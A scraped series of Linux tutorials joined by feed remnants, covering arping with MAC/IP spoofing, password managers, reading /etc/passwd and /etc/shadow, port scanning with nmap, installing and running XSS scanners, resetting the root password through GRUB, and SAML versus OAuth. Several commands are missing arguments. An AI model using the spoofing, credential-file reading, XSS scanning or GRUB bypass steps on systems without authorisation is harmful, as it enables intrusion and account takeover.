Discover Hosts

If multiple devices are connected over Ethernet, then the systems already have an internal ARP table for communicating over the network. You can use arping to list the entries in the network.

Run the following command to do so:

$ arp -a

As you can see, the command will print a list of hostnames, along with their IP and MAC addresses.
Ping Hosts

If you know the IP address of the target device, you can simply pass the address to arping to perform an ARP ping.

$ arping


Arping also allows you to define the number of times to ping the target device. To do so, use the “-c” flag, followed by the number of pings to perform.
One quick tip: If a new device is identified, you should run the following command to update the ARP table:

$ arp -a

ARP Timeout

If arping cannot resolve the IP address of the target, this will cause an ARP timeout. To demonstrate, run the following command. The IP address should be something inaccessible.

$ arping -c 7


As you can see, arping will notify you if you did not specify the network interface. This is because arping expects you to specify the interface. If not specified, arping tries to guess it.

Specify Network Interface

As you have seen in the previous section, arping prefers that you specify the network interface. This is especially necessary if there are multiple network interfaces on the server. Arping is not able to guess which network card to use.

To avoid this problem, we can manually specify the network interface to arping. If this method is used, arping will utilize the specified network interface instead of doing guesswork.

First, list all the available network interfaces with the following command:

$ ip link show

Then, specify the network interface to arping using the “-I” flag, as shown below:

$ arping -I  -c 7

Specify Source MAC Address

As in the previous method, it is also possible to specify the MAC address of the source from which you are sending the packets. To achieve this, use the “-s” flag, followed by the MAC address you desire, as follows:

$ arping -c 7 -s

Now, depending on whether you own the MAC address, there are two outcomes:

  1. If you own the MAC address, you can just go with the “-s” flag.
  2. If you do not own the MAC address, then you are trying to spoof it. If that is the case, then you will have to use the promiscuous mode. Check out more on promiscuous mode here. As a quick reminder, this mode is configured in a way that it transmits all frames received by the NIC.

The good thing is, arping can run on the promiscuous mode. To enable this mode, use the “-p” flag. The command will look something like this:

$ arping -c 7 -s  -p

Specify Source IP Address

Another interesting feature of arping is the ability to define the source IP address manually. The way that this method works is quite like the previous step.

However, this method does come with its own issues. Once arping pings the device, the device will reply back to the IP address that you manually defined. Without ownership of that IP address, arping will not receive the replies.

To define the source IP address manually, use the “-S” flag.

$ arping -c 7 -S


There are further nuances to this method. How you use this method depends on whether you own the IP address:

  1. If you own the IP address, then you are good to go.
  2. If you do not own the IP address, then you may want to use the promiscuous mode.

If your situation matches the second option, use the “-p” flag to enable the promiscuous mode.

$ arping -c 7 -S  -p

Arping Help

While these are the most commonly used arping commands, there are more features that arping offers. For example, arping offers a quick help page for documentation on the fly:

$ arping --help


If you are interested in in-depth information about the features of arping, you may dive deeper into the man page:

$ man arping

Final Thoughts

This tutorial covers some of the more common methods of using arping. You can update the ARP table and spoof MAC and IP address using promiscuous mode.

For the ambitious Linux network and system administrators, this need not be the place to stop! Check out Fierce, a more advanced and feature-packed tool used for network scanning.

Happy computing!

]]>
Bitwarden in Linux https://linuxhint.com/bitwarden_in_linux/ Tue, 17 Nov 2020 04:29:26 +0000 https://linuxhint.com/?p=76969

In the modern era, the world has seen major progression in the technological sector. New and advanced technologies have made the lives of people easier. Not long ago, people used landlines to communicate with one another, but now, devices such as smartphones have arrived. Such advances have truly revolutionized the lives of humans in ways that go beyond the concept of communication. Such has been the impact of technology on our lives that every aspect of modern life has been merged with it. Whether it involves our finances or our social profiles, all rely heavily on technology.

However, this reliance of ours has made us much more vulnerable to data breaches. The real-life cases of Adobe and eBay clearly indicate what a serious issue cybersecurity is. Cyberattacks have also been on the rise and, to top it off, even more advanced and new kinds of attacks are being developed every day. Although Linux is much more secure than Windows and other operating systems, it is still vulnerable to viruses.

Hence, it is essential to adopt measures that can protect our machines from these security attacks. One excellent solution is to use password managers. Thus, the topic of our discussion in this article will be Bitwarden, an open-source password manager.

What is Bitwarden?

Bitwarden is a free and open-source password manager that is available for Linux and all other major operating systems, like Windows and macOS. Bitwarden also has extensions for all the popular web browsers, such as Chrome, Firefox, Edge, etc. It even has applications available for both Android and IOS mobile devices. Bitwarden offers a very user-friendly and easy-to-use interface, making its graphical interface an excellent choice to have. It works by storing your passwords and other sensitive data inside of an encrypted vault, which itself is protected by a master password. Bitwarden offers both a free and paid account to its users, with the latter having different plans, all of which are low-priced when compared with the market. The free version of Bitwarden, however, is also a very notable choice, as it offers a wide array of features that cannot be found in other password managers.

Installing Bitwarden

Before we move onto the installation process of Bitwarden, it is important to know that you need to sign up for an account to use this program. Simply go to the official website of Bitwarden, click the Create your Free Account option, and input your details to create an account.


Once you are done creating your account, it is also good practice to install an extension of Bitwarden inside your web browser for automatic fill-in of your login details. You can install this either by going to the official extension and add-ons page of your browser or by clicking the options available on Bitwarden’s official webpage.


There are two primary methods of installing Bitwarden on your machine. We will look at them in the following section.

Installing Bitwarden Using AppImage

To install Bitwarden using its AppImage, once again, open Bitwarden’s official website. Then, select the Download option from the top of the page and click on the Linux segment found under the Desktop heading.

This will download an AppImage onto your Linux machine. To start using Bitwarden, first, you must give it executable permission. This can be done by right-clicking on the icon and selecting the Properties option. 



Next, open the Permissions tab and click the square box next to the line Allow executing file as program to make your AppImage executable.


Now, Bitwarden can be opened by double-clicking the AppImage file.

Installing Bitwarden Using Snap

Another method of installing Bitwarden on your computer is by using Snaps. Snaps are applications that include all the dependencies bundled together inside a software package. This removes the hassle of separately installing dependencies along with your application. To install Bitwarden using Snaps, simply run the following command in the terminal:

$ sudo snap install bitwarden

Using Bitwarden

After downloading and opening Bitwarden, a login menu will appear in front of your screen. Enter your login details to start using Bitwarden. Note that if you were not able to make your Bitwarden account before, you can do so from here.


After logging in, Bitwarden will take you to your Vault, where all your passwords and sensitive data will be saved.


You can manually add items inside your Vault by clicking on the plus icon, as seen in the image above. This will open a window into which you can input any details about your account that you want to add.


You can also change the type of item that you want to add by selecting options from the drop-down menu, as indicated in the image below.


It is important to note that the item details that you input in this window will change depending on what type you choose to add.

When adding accounts to your Vault, you can also use the Password Generator option of Bitwarden, which will automatically generate a secure password for you.


To keep track of all these passwords, you can use the Password History option in the View tab, where all generated passwords will be stored.


You can also sync your account with your web browser by going to the File option and selecting the Sync Vault option. 


Bitwarden even allows you to export your Vault by using the Export Vault option, as seen in the image above. The exported files will either be in the json or csv format.

So, Why Use Bitwarden?

There is no doubt that the Internet has revolutionized the world, as it has now become an integral part of our daily lives. As we are now highly dependent on technology for our day-to-day work, this dependency has paved the way for cybersecurity issues to arise and has led to severe cases of identity theft and data leakage. Bitwarden is an excellent choice to protect your machine from such threats, as it offers a way for users to protect their data and keep their systems secure.

]]>
KeePassXC on Linux https://linuxhint.com/keepassxc_linux/ Sun, 15 Nov 2020 05:24:06 +0000 https://linuxhint.com/?p=76670 In the present world, technology runs our lives as we have become fully dependent on devices such as smartphones, computers, etc. and it has become an integral part of our everyday lives. Such has been its impact that a life without these devices just cannot be imagined. With the invention of cars, planes, Google, and computers, humans have indeed become much more efficient and less erroneous. Things like artificial intelligence, cloud computing, blockchains, virtual reality, and so many others have opened astounding avenues for humans to explore and have allowed humans to step into a realm that could only have been imagined in science fiction books.

However, our dependency on technology has also led to our privacy being more exposed than ever. Things like data breaches and cyber-attacks have become quite the norm and are growing in scale with time. Linux users have had less to worry about these issues as it has often been said that Linux systems are more secure than its counterparts, but it is important to remember that hackers are becoming more skilled, and thus, it still is not a hundred percent completely safe from malicious attacks. Therefore, it is essential for one to employ procedures with which they can protect their Linux systems. One excellent solution is to use a password manager, which shall also be the topic of our discussion in this article, where we will be focusing on one open-source password manager by the name of KeePassXC.

What is KeePassXC?

KeePassXC is an open-source & free password manager that has been based on KeePassX, the Linux port for the Windows supported software, KeePass. KeePassXC is cross-platform as it is available for operating systems like Windows, Linux, and Mac OS. KeePassXC allows users to store all types of sensitive data such as usernames, passwords, attachments, notes, and so on. It does this by storing this data inside encrypted databases, which itself is protected by a master password. This works quite efficiently as our data remains secure, and even if someone was able to get their hands on it, they would not be able to read it without the decryption password.

Installing KeePassXC

There are mainly two ways of installing KeePassXC on your Linux machine. Let us look at them:
 
1) Installing KeePassXC using AppImage
The first method involves installing KeePassXC using an AppImage. To download this, open the official website of KeePassXC, then select the Download option from up top, and under the Linux heading, click on the Official AppImage title.

Linux Header:


Official AppImage:


This will download an AppImage onto your Linux machine. To start using this, first, you must give it executable permission, which can be done by right-clicking on it and selecting the properties option.


Next, open the Permissions tab and click on the square box next to the line Allow executing file as a program to make your AppImage executable.


Now, KeePassXC can simply be opened by double-clicking the AppImage file.
 
2) Installing KeePassXC using Snap
Another way of installing KeePassXC on your Linux system is through the Snap Package Manager, which allows users to install small packages called snaps that already have all the requirements bundled inside of them. This saves time as now; there is no need to separately install dependencies of applications. To install KeePassXC from its Snap, enter the following command into the terminal and press enter:

$ sudo snap install keepassxc

Using KeePassXC

After downloading and opening KeePassXC, the very first thing you need to do here is create your own Vault or a password-protected database. To do this, click on the Create new database option, as seen in the option above. This will then open a window where you must enter the name and description of your Database:


Fill in the blanks and then press Continue. In the next window, you can change the encryption settings, the database format as well as some other advanced settings.


Next, you must enter your master password, which will be needed to decrypt and unlock your database. You can also use its built-in auto generator to generate a password for you, as indicated by the arrow in the image below:


You can also add Key Files and YubiKeys for additional protection. 


After pressing done, it will then ask you to save your password database. Finally, your Vault will appear, which will be empty in the beginning. To add items into your Vault, press the Plus icon in the toolbar, which will then open an entry page where you can fill in the details of your item. KeePassXC also allows users to put in expiry dates for your entries as well as an auto password generator as indicated by the circle in the image below: 


Along with this, you can add other elements to your entries, such as attachments, icons, and even change the properties of this. You can even enable the auto-type option, which can automatically fill in your passwords. 


KeePassXC also allows you to create folders and subfolders of your passwords, which are called Groups. You can create and edit Groups from the Groups option available on the menu.


You can also import or export passwords into these groups from the KeeShare tab.

Similarly, you can import and export your password databases from the options available in the Database heading in the menu. 


Another excellent feature of KeePassXC is the integration of browsers with your desktop application. You can turn this on by going inside Settings, selecting the Browser Integration option, and then checking the Enable browser integration on. You can then enable the integration for the specific browsers that you have.


Now, your desktop application will remain in sync with your browser extension.

So, Why Use KeePassXC?

Security concerns have risen in the past couple of years as with the demand for the internet increasing, more and more cases of privacy issues are emerging. Using KeePassXC helps to protect your machines from such events and keeps your data secure.

]]>
Where and how are passwords stored on Linux? https://linuxhint.com/where_and_how_are_passwords_stored_on_linux/ Tue, 10 Nov 2020 04:56:30 +0000 https://linuxhint.com/?p=76461 The user name with a corresponding password for a specific account is the primary requirement through which a user can access a Linux system. All user’s accounts password is saved in a file or a database so that a user can be verified during the login attempt into the system. Every user does not have enough skills and expertise to locate this file on their system. However, if you get access to the database or a file that keeps all the login user’s passwords, then you can easily access the Linux system. When a user enters a username and password on Linux for login, it checks the entered password against an entry in various files of the ‘/etc’ directory.

The /etc/passwd files keep all the important information that is necessary for user login. To explain it in simpler words, the /etc/passwd file stores the user’s account details. This file is a plain text file that contains a complete list of all users on your Linux system. It has the information about username, password, UID (user id), GID (group id), shell, and home directory. This file should have read permissions as many command-line utilities are used to map the user IDs to the user name. But, should have limited write access permissions only for superuser or root user accounts.

This article will demonstrate how and where you can store system user’s account passwords on Linux distribution. We have implemented all demonstrations on Ubuntu 20.04 system. However, you can find /etc/passwd file on any Linux distribution.

Pre-requisites

You should have root privileges to run administrative commands.

Basic Understanding about /etc/passwd File

The /etc/passwd file contains the information about the user account of your system. All stored fields are separated from the colon “:” sign.
When you run the following command, you will see each file entry of /etc/passwd file:

$ cat /etc/passwd

The above command will list all users of your Linux system.
The following type of format will display on your terminal screen:

Details about /etc/passwd fields Format
From the above image:

Username: Field one represents the user’s name. The length of the username field is defined between 1-32 characters. This is used when a user logs in into the system. In the above example, ‘khuzdar’ is the username.
Password: In the above example, the “x” character shows that password is stored in encrypted form in the /etc/shadow file.
User ID (UID): User ID must be separately assigned to each user. The UID zero is assigned to the root user, and User IDs from 1-99 are assigned to predefined or standard accounts. The further UIDs from 100-999 are assigned to system administrative accounts or groups. In the above screenshot, the user ID is 1001.
Group ID (GID): The next field represents the group ID. The GID is stored into /etc/group file. Based on the above example, the user belongs to the group id 1001.
Information about User ID: The following field is intended for comments. In this field, you can add some additional information about the specified user, such as the user’s full name, phone number, etc. However, in the above example, no phone number is provided by the user.
Home directory: This field shows the location of the home directory that is assigned to the current user. If the specified directory does not exist, then it will display “/”. The above image shows the location of the highlighted user in the home directory, which is home/kbuzdar.
Command//shell: The default absolute path of a shell or command is /bin/bash. This is known as the shell. For example, sysadmin using the nologin shell. It behaves as the replacement shell for the system user accounts. If the shell is located at the path to /sbin/nologin and the user wants to log in directly to the Linux system, the /sbin/nologin shell will close or disable the connection.

Search user in /etc/passwd file

You can search for a specific user with /etc/passwd file, using the grep command. For example, we want to search the username ‘kbuzdar’ from the /etc/passwd file, using the following syntax, then we can easily search a specified user, saving our time:

$ grep user-name /etc/passwd

The above syntax will change into the following shape:

$ grep kbuzdar /etc/passwd


Or

$ grep -w '^kbuzdar' /etc/passwd

Display permissions on /etc/passwd file

As we mentioned above, all other users, except root, should be able to read permission on the /etc/passwd file, and that the owner must be superuser or root.
Type the following to check the read permissions on the file:

$ ls -l /etc/passwd

The following output sample will be displayed on the terminal:

Reading /etc/passwd file

You can read the /etc/passwd file on your Linux system by using the following bash script or directly run what’s written below while loop commands on the terminal.
Create a text file and paste the following code in it:

#!/bin/bash
# total seven fields from /etc/passwd stored as $f1,f2...,$f7

while IFS=: read -r f1 f2 f3 f4 f5 f6 f7
do
 echo "User $f1 use $f7 shell and stores files in $f6 directory."
done < /etc/passwd

Using the while loop, it will read all seven fields and then iteratively display the file content on the terminal.
Save the above file with the name ‘readfile.sh’.

Now, run the above file by using the following command:

$ bash readfile.sh

Explore /etc/shadow file

The /etc/shadow file contains all your encrypted passwords that are stored in this file that are only readable for root users.
Let’s run the following command to display the content:

$ sudo cat /etc/shadow

You can see all the password in the encrypted format:

Conclusion

We have seen from the above article, all the user’s account details and passwords stored on /etc/passwd file in the Linux system. You can read this file, but only root users have the “write permissions”. Moreover, we have also seen all the encrypted passwords stored on the /etc/shadow file. You can also explore /etc/group file to get details about the user’s group.

]]>
How to Check If a Port Is in Use in Linux https://linuxhint.com/check_port_use_linux/ Fri, 23 Oct 2020 07:14:09 +0000 https://linuxhint.com/?p=72827

If you are from a computer science background or even a little bit familiar with networking, then you may have heard of the TCP/IP stack. The TCP/IC stack comprises of five different layers, namely, the Physical Layer, Data Link Layer, Network Layer, Transport Layer, and Application Layer. Every layer of the TCP/IP stack has a different means of communication, and all communication within the Transport Layer is done via port numbers.

A port number is used to uniquely identify a device alongside the IP address. Inter-process communication is common when using computer systems. To facilitate this communication, operating systems keep certain ports open, depending upon the entity with which the user wishes to communicate. So, at any single instance, multiple ports can be open in your system.

When we say that a port is in use, we are essentially referring to a port that is open, or, in other words, a port that is in the listening state (ready to accept connections). There are multiple ways of determining the ports that are open in an operating system. This article shows you four possible methods to use to check whether a port is in use in Linux.

Note: All the methods demonstrated in this article have been executed in Linux Mint 20.

To determine whether a port is in use in Linux Mint 20, any of the following four methods can be used.

Method 1: Using the lsof Command

The lsof command can be used to list all the ports in use in your system in the following manner:

First, launch the Linux Mint 20 terminal by clicking on its shortcut icon. The terminal is shown in the image below:

Next, you will have to install the lsof command if you have never used it before. To do so, execute the following command in the terminal:

$ sudo apt-get install lsof

Upon the successful installation of the command, you will see the following output in the terminal:

Once this command has been installed, it can be used for querying any ports that are in use in Linux. To check your system for open ports, execute the following command in your terminal:

$ sudo lsof –i

In the output of this command, the ports listed in the “LISTEN” state are the ones that are in use, as shown in the image below:

Method 2: Using the ss Command

The ss command can be used to determine any open TCP and UDP ports in your system in the following manner:

To query both the TCP and UDP ports that are in use, execute the following command in the terminal:

$ ss –lntup

In the output of this command, the ports (both TCP and UDP) that are in use have the “LISTEN” state, whereas all the other ports show the “UNCONN” state.

Method 3: Using the netstat Command

The netstat command can also be used to determine any open TCP and UDP ports in your system in the following manner:

To query for the TCP and UDP ports that are in use, run the following command in the terminal:

$ sudo netstat –pnltu

If you try to run this command without the “sudo” keyword, you will not be able to access all the ports. If you are logged in with the root user account, then you may skip this keyword.

When you run this command, you will be able to see that all ports in use are in the “LISTEN” state, whereas the states of all other ports are unavailable, as shown in the image below:

Method 4: Using the nmap Command

The nmap command is yet another utility that can be used to determine the TCP and UDP ports that are in use in the following manner:

If the nmap utility is not yet installed on your Linux Mint 20 system, as it does not come installed by default, you may have to manually install it. To do so, execute the following command:

$ sudo apt install nmap

Once you have successfully installed the nmap utility on your Linux Mint 20 system, your terminal will return you the control back so that you can execute the next command, as shown in the image below:

After installing this utility, query for both the TCP and UDP ports that are in use in your system by running the following command in the terminal:

$ sudo nmap –n –PN –sT –sU –p- localhost

Once you have executed this command, the state of all ports that are in use will be “open,” as shown in the output in the image below:

Conclusion

This article showed you four different methods for checking whether a port is in use in your Linux system. All of these methods were tested with Linux Mint 20, however, you can also run the commands shown in these methods with any other distribution of Linux, with slight variations. Each of the commands used in these methods takes only a few seconds to execute. So, you have the time to try any of the four methods to see which one works best for you.

]]>
Free XSS Tools https://linuxhint.com/free_xss_tools/ Thu, 22 Oct 2020 08:54:02 +0000 https://linuxhint.com/?p=72649 Cross-Site Scripting, commonly known as XSS, is a type of vulnerability in which attackers remotely inject custom scripts on web pages. It commonly occurs in sites where data input parameters are improperly sanitized.

Sanitization of inputs is the process of cleansing of the inputs, so the data inserted is not used to find or exploit security holes in a website or server.

Vulnerable sites are either unsanitized or very poorly and incompletely sanitized. It is an indirect attack. The payload is indirectly sent to the victim. The malicious code is inserted on the website by the attacker, and then it becomes a part of it. Whenever the user (victim) visits the webpage, the malicious code is moved to the browser. Hence, the user is unaware of anything happening.

With XSS, an attacker can:

  • Manipulate, destroy, or even deface a website.
  • Expose sensitive user data
  • Capture user’s authenticated session cookies
  • Upload a Phishing page
  • Redirect users to a malicious area

XSS has been in the OWASP Top Ten for the last decade. More than 75% of the surface web is vulnerable to XSS.

There are 4 types of XSS:

  • Stored XSS
  • Reflected XSS
  • DOM-based XSS
  • Blind XSS

When checking for XSS in a pentest, one may get weary of finding the injection. Most pentesters use XSS Tools to get the job done. Automating the process not only saves time and effort but, more importantly, gives accurate results.

Today we will discuss some of the tools which are free and helpful. We will also discuss how to install and use them.

XSSer:

XSSer or cross-site scripter is an automatic framework that helps users find and exploit XSS vulnerabilities on websites. It has a pre-installed library of around 1300 vulnerabilities, which helps bypass many WAFs.

Let’s see how we can use it to find XSS vulnerabilities!

Installation:

We need to clone xsser from the following GitHub repo.

$ git clone https://github.com/epsylon/xsser.git

Now, xsser is in our system. Traverse into the xsser folder and run setup.py

$ cd xsser
$ python3 setup.py

It will install any dependencies, which already been installed and will install xsser. Now it’s time to run it.

Run GUI:

$ python3 xsser --gtk

A window like this would appear:

If you are a beginner, go through the wizard. If you are a pro, I will recommend configuring XSSer to your own needs through the configure tab.

Run in Terminal:

$ python3 xsser

Here is a site that challenges you to exploit XSS. We will find a few vulnerabilities by using xsser. We give the target URL to xsser, and it will start checking for vulnerabilities.

Once it is done, results are saved in a file. Here is an XSSreport.raw. You can always come back to see which of the payloads worked. Since this was a beginner level challenge, most of the vulnerabilities are FOUND here.

XSSniper:

Cross-Site Sniper, also known as XSSniper, is another xss discovery tool with mass scanning functionalities. It scans the target for GET parameters and then injects an XSS payload into them.

Its ability to crawl the target URL for relative links is deemed as another useful feature. Every link found is added to the scan queue and processed, so it is easier to test an entire website.

In the end, this method is not foolproof, but it’s a good heuristic to mass find injection points and test escape strategies. Also, since there is no browser emulation, you have to manually test the discovered injections against various browser’s xss protections.

To install XSSniper:

$ git clone https://github.com/gbrindisi/xsssniper.git

XSStrike:

This cross-site scripting detection tool is equipped with:

  • 4 hand-written parsers
  • an intelligent payload generator
  • a powerful fuzzing engine
  • an incredibly fast crawler

It deals with both reflected and DOM XSS Scanning.

Installation:

$ cd XSStrike
$ ls

$ pip3 install -r requirements.txt

Usage:

Optional arguments:

Single URL scan:

$ python xsstrike.py -u http://example.com/search.php?q=query

Crawling example:

$ python xsstrike.py -u "http://example.com/page.php" --crawl

XSS Hunter:

It is a recently launched framework in this field of XSS vulnerabilities, with the perks of easy management, organization & monitorization. It generally works by keeping specific logs through HTML files of web pages. To find any type of cross-site scripting vulnerabilities, including the blind XSS (which is, generally, often missed) as an advantage over common XSS tools.

Installation:

$ sudo apt-get install git (if not already installed)
$ git clone https://github.com/mandatoryprogrammer/xsshunter.git

Configuration:

– run the configuration script as:

$ ./generate_config.py

– now start the API as

$ sudo apt-get install python-virtualenv python-dev libpq-dev libffi-dev
$ cd xsshunter/api/
$ virtualenv env
$ . env/bin/activate
$ pip install -r requirements.txt
$ ./apiserver.py

To use GUI server, you need to follow and execute these commands:

$ cd xsshunter/gui/
$ virtualenv env
$ .env/bin/activate
$ pip install -r requirements.txt
$ ./guiserver.py

W3af:

Another open-source vulnerability testing tool which mainly uses JS to test specific webpages for vulnerabilities. The major requirement is configuring the tool according to your demand. Once done, it will efficiently do its work and identify XSS vulnerabilities. It is a plugin-based toolwhich is mainly divided into three sections:

  • Core (for basic functioning and providing libraries for plugins)
  • UI
  • Plugins

Installation:

To install w3af onto your Linux system, just follow-through the steps below:

Clone the GitHub repo.

$ sudo git clone https://github.com/andresriancho/w3af.git

Install the version you want to use.

>If you like to use the GUI version:

$ sudo ./w3af_gui

If you prefer to use the console version:

$ sudo ./w3af_console

Both of them will require installing dependencies if not already installed.

A script is created at /tmp/script.sh, which will install all the dependencies for you.

The GUI version of w3af is given as follows:

Meanwhile, the console version is the traditional terminal (CLI)-look tool.

Usage

1. Configure target

In target, menu run command set target TARGET_URL.

2. Config audit profile

W3af comes with some profile that already has properly configured plugins to run an audit. To use profile, run command, use PROFILE_NAME.

 

3. Config plugin

4. Config HTTP

5. Run audit

For more information, go to http://w3af.org/:

Cessation:

These tools are just a drop in the ocean as the internet is full of amazing tools. Tools like Burp and webscarab can also be used to detect XSS. Also, hats-off to the wonderful open-source community, which comes up with exciting solutions for every new and unique problem. ]]> How to Change or Reset Root Password in Linux https://linuxhint.com/change_reset_root_pasword_linux/ Thu, 22 Oct 2020 08:49:29 +0000 https://linuxhint.com/?p=72683

If you have not logged in as a root user for a long time and have not saved the login information anywhere, there is a chance that you may lose access to the credentials for your system. It is not an unusual occurrence, but rather, a common issue, which most Linux users have probably encountered before. If this happens, you can easily change or reset the password via the command-line or the GUI (Graphical User Interface).

But what do you do if the root password must be modified or reset?

This article shows you how to change the root password for your Linux Mint 20 system via three different methods.

Note: To change the root password, you must have either the current root password, sudo privileges, or have physical access to the system. It is also recommended to save the new password(s) in a secure location to be accessed when needed.

In this article, we will cover how to:

  1. Change or reset root password as root user
  2. Change or reset root password as sudo user
  3. Change or reset root password using GRUB menu

It is worth mentioning that all the commands included in this article have been tested in the Linux Mint 20 system. These commands have been performed in the Terminal, which can be opened using the Ctrl+Alt+T key shortcut, or by clicking on the terminal icon present in the taskbar of the Linux system.

Change or Reset Root Password as Root User

If you have the current root password and want to reset it, you can do so by using the ‘passwd’ command. Perform the following steps to change or reset the root user password:

First, log in as a root user using the following command in Terminal:

$ su root

When you are asked to provide the password, enter the current root password. Next, you will see the Terminal prompt changed to ‘#,’ indicating that you are now logged in as the root user.

To change the root password, type the following command in the Terminal:

$ passwd

You will be prompted to enter a new root password. Type the new password and hit the Enter key. Then, re-enter the password and press the Enter key to avoid any typos.

After entering the password, you will be shown a message saying that the password has been updated successfully.

Change or Reset Root Password as Sudo User

The root password can also be changed by a standard user with sudo privileges. You can change or reset the root user password by following the steps given below:

Type the following command as a sudo user in the Terminal to change the root password.

$ sudo passwd root

You will be asked to type a new password for the root user. Enter a new password and press Enter. Then, re-enter the password and press the Enter key to avoid any typos.

After entering the password, you will be shown a message saying that the password has been updated successfully.

Change or Reset Root Password Using GRUB Menu

If you are a root user and have forgotten the root password to your system, then you can reset the root password using the GRUB menu. GRUB is the first program that starts at system boot. However, keep in mind that physical access to your system is required to use the method described in this section.

To reset or change the root password using the GRUB menu, perform the following steps:

Restart the system and hold the Shift key or press the Esc key to enter into safe mode (recovery mode). Once you have entered safe mode, you will see the GRUB menu, as shown in the following screenshot.

Next, navigate to the Advanced options.

Then, to switch to the edit window, click ‘e’ on the keyboard.

You will see the following screen:

Scroll down the screen until you see the following line:

“linux /boot/vmlinuz-5.4.0-26-generic root=UUID=35\2d26aa-051e
-4dbe-adb2-7fbb843f6581 ro quiet splash”

Replace ‘ro‘ with ‘rw’ in the above line and, at the end of the line, append ‘init=/bin/bash’. It should now look like this:

“linux /boot/vmlinuz-5.4.0-26-generic root=UUID=35\
2d26aa-051e-4dbe-adb2-7fbb843f6581 rw quiet splash init=/bin/bash

Adding ‘rw’ and ‘init=/bin/bash’ in the above line basically tells the system to log in to bash with read/write privileges. Note that this configuration will only apply for the current boot, not for subsequent boots.

Now, use the F10 key or the Ctrl+X shortcut to boot up to a command prompt, as shown in the following screenshot.

In the command prompt that appears, type the following command:

$ passwd root

You will be prompted for the root password. Input the root password and press the Enter key. Then, retype the password and press Enter to avoid any typos.

Note: You can change not only the root password but also any user’s password using this process.

After entering the password, you will then see a message stating that the new password has been updated.

Finally, use the Ctrl+Alt+Delete shortcut or type the following command at the command prompt to exit and reboot your system.

exec /sbin/init

That is all you need to do to change or reset the root password of your Linux Mint 20 system without the sudo or root login. It is good practice to change the password frequently after some time, especially if you think it has been compromised.

Conclusion

In this article, we have identified three different methods to modify or reset the root password on your system. You can opt for any method, based on the privileges you have. If you have the root password or sudo privileges, you can easily reset the root password using the simple ‘passwd’ command. Otherwise, you can use the GRUB menu to change the root password, but only if you have physical access to the system.

I hope this article has helped you in changing or resetting the root password of your system.

]]>
SAML vs. OAUTH https://linuxhint.com/saml_vs_oauth/ Tue, 20 Oct 2020 04:31:58 +0000 https://linuxhint.com/?p=72438 SAML and OAUTH are technical standards for authorizing users. These standards are used by Web Application developers, security professionals, and system administrators who are looking to improve their identity management service and enhance methods that clients can access resources with a set of credentials. In cases where access to an application from a portal is needed, there is a need for a centralized identity source or Enterprise Single Sign On. In such cases, SAML is preferable. In cases where temporary access to resources such as accounts or files is needed, OAUTH is considered the better choice. In mobile use cases, OAUTH is mostly used. Both SAML (Security Assertion and Markup Language) and OAUTH (Open Authorization) are used for web Single Sign On, providing the option for single sign-on for multiple web applications.

SAML

SAML is used to allow web applications’ SSO providers to transfer and move credentials between the Identity Provider (IDP), which holds the credentials, and the Service Provider (SP), which is the resource in need of those credentials. SAML is a standard authorization and authentication protocol language that is mostly used to perform federation and identity management, along with Single Sign On management. In SAML, XML metadata documents are used as a token for submission of the client’s identity. The authentication and authorization process of SAML is as follows:

  1. The user requests to log into the service via the browser.
  2. The service informs the browser that it is authenticating to a specific Identity Provider (IdP) registered with the service.
  3. The browser relays the authentication request to the registered Identity Providers for login and authentication.
  4. Upon successful credential/authentication check, the IdP generates an XML-based assertion document verifying the user’s identity and relays this to the browser.
  5. The browser relays the assertion to the Service Provider.
  6. The Service Provider (SP) accepts the assertion for entry and allows the user access to the service by logging them in.

Now, let us look at a real-life example. Suppose a user clicks the Login option on the image-sharing service on the website abc.com. To authenticate the user, an encrypted SAML authentication request is made by abc.com. The request will be sent from the website directly to the authorization server (IdP). Here, the Service Provider will redirect the user to the IdP for authorization. The IdP will verify the received SAML authentication request, and if the request turns out valid, it will present the user with a login form to enter the credentials. After the user enters the credentials, the IdP will generate a SAML assertion or SAML token containing the user’s data and identity and will send it to the Service Provider. The Service Provider (SP) verifies the SAML assertion and extracts the data and identity of the user, assigns the correct permissions to the user, and logs the user into the service.

Web Application developers can use SAML plugins to ensure that the app and resource both follow the needed Single Sign On practices. This will make for a better user login experience and more effective security practices that leverage a common identity strategy. With SAML in place, only users with the correct identity and assertion token can access the resource.

OAUTH

OAUTH is used when there is a need to pass authorization from one service to another service without sharing the actual credentials, like the password and username. Using OAUTH, users can sign in on a single service, access the resources of other services, and perform actions on the service. OAUTH is the best method used to pass authorization from a Single Sign On platform to another service or platform, or between any two web applications. The OAUTH workflow is as follows:

  1. The user clicks the Login button of a resource sharing service.
  2. The resource server shows the user an authorization grant and redirects the user to the authorization server.
  3. The user requests an access token from the authorization server using the authorization grant code.
  4. If the code is valid after logging into the authorization server, the user will get an access token that can be used to retrieve or access a protected resource from the resource server.
  5. On receiving a request for a protected resource with an access grant token, the validity of the access token is checked by the resource server with the help of the authorization server.
  6. If the token is valid and passes all the checks, the protected resource is granted by the resource server.

One common use of OAUTH is allowing a web application to access a social media platform or other online account. Google user accounts can be used with many consumer applications for several different reasons, such as blogging, online gaming, logging in with social media accounts, and reading articles on news websites. In these cases, OAUTH works in the background, so that these external entities can be linked and can access the necessary data.

OAUTH is a necessity, as there must be a way to send authorization info between different applications without sharing or exposing user credentials. OAUTH is also used in businesses. For example, suppose a user needs to access a company’s Single Sign On system with their username and password. The SSO gives it access to all the needed resources by passing OAUTH authorization tokens to these apps or resources.

Conclusion

OAUTH and SAML are both very important from a web application developer’s or system administrator’s point of view, while both of them are very different tools with different functions. OAUTH is the protocol for access authorization, while SAML is a secondary location that analyses the input and provides authorization to the user.

]]>
Cybersecurity Career Paths https://linuxhint.com/cybersecurity_career_paths/ Tue, 06 Oct 2020 18:33:13 +0000 https://linuxhint.com/?p=69984 With recent innovations in computing technology, every company has deployed their services to the cloud. Networks have risen to an unfathomable scale. Almost every company now holds thousands of terabytes of critical data regarding their customers and clients in the cloud. While this age of networks and big data has created a lot of ease for people, if not stored properly, the confidential data of millions of individuals could become exposed to malicious parties.

This has created a large demand for cybersecurity experts. Companies spend millions of dollars hiring cybersecurity experts to safeguard and maintain their servers and to prevent unauthorized access to confidential data. Therefore, cybersecurity has become a lucrative career path for rookie and veteran IT experts alike.

The IT industry is heavily invested in industrial security to protect sensitive information for businesses, both big and small. It would be foolish to ignore the horizon of cybersecurity career paths in the near future.

What is Cybersecurity?

Cybersecurity is the exercise of protecting networks and computers from BlackHat hackers and threat actors. Hackers may try to access, delete, or alter sensitive information that is stored on servers.

